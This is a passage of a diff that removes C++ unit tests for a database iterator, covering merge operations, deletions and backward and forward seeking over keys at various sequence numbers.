-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      1, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2,merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      3, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      4, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      5, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("a", "merge_3");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddMerge("a", "merge_4");
-    internal_iter->AddMerge("a", "merge_5");
-    internal_iter->AddMerge("a", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      6, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5,merge_6");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator7) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val,merge_2");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      4, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      5, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4");
-    db_iter->Prev();
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      6, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      7, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      9, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_6,merge_7");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      13, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_4,merge_5");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(),
-              "merge_6,merge_7,merge_8,merge_9,merge_10,merge_11");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddPut("b", "val");
-    internal_iter->AddMerge("b", "merge_2");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_3");
-
-    internal_iter->AddMerge("c", "merge_4");
-    internal_iter->AddMerge("c", "merge_5");
-
-    internal_iter->AddDeletion("b");
-    internal_iter->AddMerge("b", "merge_6");
-    internal_iter->AddMerge("b", "merge_7");
-    internal_iter->AddMerge("b", "merge_8");
-    internal_iter->AddMerge("b", "merge_9");
-    internal_iter->AddMerge("b", "merge_10");
-    internal_iter->AddMerge("b", "merge_11");
-
-    internal_iter->AddDeletion("c");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      14, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(),
-              "merge_6,merge_7,merge_8,merge_9,merge_10,merge_11");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-}
-
-TEST_F(DBIteratorTest, DBIterator8) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddDeletion("a");
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 10, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToLast();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-}
-
-// TODO(3.13): fix the issue of Seek() then Prev() which might not necessary
-//             return the biggest element smaller than the seek key.
-TEST_F(DBIteratorTest, DBIterator9) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddMerge("a", "merge_1");
-    internal_iter->AddMerge("a", "merge_2");
-    internal_iter->AddMerge("b", "merge_3");
-    internal_iter->AddMerge("b", "merge_4");
-    internal_iter->AddMerge("d", "merge_5");
-    internal_iter->AddMerge("d", "merge_6");
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(NewDBIterator(
-        env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-        internal_iter, 10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-
-    db_iter->Seek("b");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_1,merge_2");
-
-    db_iter->SeekForPrev("b");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-
-    db_iter->Seek("c");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-
-    db_iter->SeekForPrev("c");
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_3,merge_4");
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-    ASSERT_EQ(db_iter->value().ToString(), "merge_5,merge_6");
-  }
-}
-
-// TODO(3.13): fix the issue of Seek() then Prev() which might not necessary
-//             return the biggest element smaller than the seek key.
-TEST_F(DBIteratorTest, DBIterator10) {
-  ReadOptions ro;
-  Options options;
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->AddPut("c", "3");
-  internal_iter->AddPut("d", "4");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 10, options.max_sequential_skip_in_iterations));
-
-  db_iter->Seek("c");
-  ASSERT_TRUE(db_iter->Valid());
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-
-  db_iter->SeekForPrev("c");
-  ASSERT_TRUE(db_iter->Valid());
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "d");
-  ASSERT_EQ(db_iter->value().ToString(), "4");
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-}
-
-TEST_F(DBIteratorTest, SeekToLastOccurrenceSeq0) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 10, 0 /* force seek */));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "1");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-  db_iter->Next();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator11) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "0");
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddSingleDeletion("b");
-  internal_iter->AddMerge("a", "1");
-  internal_iter->AddMerge("b", "2");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 1, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToFirst();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "0");
-  db_iter->Next();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  db_iter->Next();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator12) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("a", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->AddPut("c", "3");
-  internal_iter->AddSingleDeletion("b");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 10, 0));
-  db_iter->SeekToLast();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "1");
-  db_iter->Prev();
-  ASSERT_FALSE(db_iter->Valid());
-}
-
-TEST_F(DBIteratorTest, DBIterator13) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  std::string key;
-  key.resize(9);
-  key.assign(9, static_cast<char>(0));
-  key[0] = 'b';
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut(key, "0");
-  internal_iter->AddPut(key, "1");
-  internal_iter->AddPut(key, "2");
-  internal_iter->AddPut(key, "3");
-  internal_iter->AddPut(key, "4");
-  internal_iter->AddPut(key, "5");
-  internal_iter->AddPut(key, "6");
-  internal_iter->AddPut(key, "7");
-  internal_iter->AddPut(key, "8");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 2, 3));
-  db_iter->Seek("b");
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), key);
-  ASSERT_EQ(db_iter->value().ToString(), "2");
-}
-
-TEST_F(DBIteratorTest, DBIterator14) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = nullptr;
-
-  std::string key("b");
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  internal_iter->AddPut("b", "0");
-  internal_iter->AddPut("b", "1");
-  internal_iter->AddPut("b", "2");
-  internal_iter->AddPut("b", "3");
-  internal_iter->AddPut("a", "4");
-  internal_iter->AddPut("a", "5");
-  internal_iter->AddPut("a", "6");
-  internal_iter->AddPut("c", "7");
-  internal_iter->AddPut("c", "8");
-  internal_iter->AddPut("c", "9");
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(
-      NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-                    internal_iter, 4, 1));
-  db_iter->Seek("b");
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "3");
-  db_iter->SeekToFirst();
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "4");
-}
-
-class DBIterWithMergeIterTest : public testing::Test {
- public:
-  DBIterWithMergeIterTest()
-      : env_(Env::Default()), icomp_(BytewiseComparator()) {
-    options_.merge_operator = nullptr;
-
-    internal_iter1_ = new TestIterator(BytewiseComparator());
-    internal_iter1_->Add("a", kTypeValue, "1", 3u);
